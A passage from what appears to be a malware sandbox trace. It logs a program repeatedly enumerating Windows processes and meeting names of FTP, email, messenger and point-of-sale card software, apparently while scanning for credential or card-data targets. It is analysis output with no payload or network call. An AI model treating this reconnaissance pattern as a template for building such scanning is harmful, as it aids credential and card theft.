th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0216.296] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0216.298] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0216.300] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0216.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0216.304] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0216.306] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0216.308] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0216.313] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0216.315] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0216.317] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0216.319] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0216.321] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0216.323] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0216.325] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0216.365] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0216.367] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0216.369] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0216.370] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0216.372] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0216.374] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0216.376] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0216.378] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0216.380] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0216.381] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0216.383] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0216.385] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0216.387] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0216.389] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0216.391] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0216.392] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0216.397] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0216.398] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0216.453] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0216.457] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0216.459] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0216.461] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0216.463] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0216.464] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0216.466] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0216.468] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0216.470] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0216.471] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0216.473] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0216.475] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0216.476] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0216.478] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0216.480] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.482] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0216.483] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0216.485] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.486] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.488] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0216.489] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0216.527] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0216.529] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0216.530] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0216.532] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0216.534] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0216.536] CloseHandle (hObject=0x1eb8) returned 1 [0216.536] Sleep (dwMilliseconds=0x64) [0216.590] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0216.614] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.616] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.664] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.666] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.670] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.672] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.674] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.675] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.677] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.678] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.680] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.681] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.683] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.685] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.686] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.688] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.689] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.691] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.692] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0216.694] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.696] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0216.698] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: 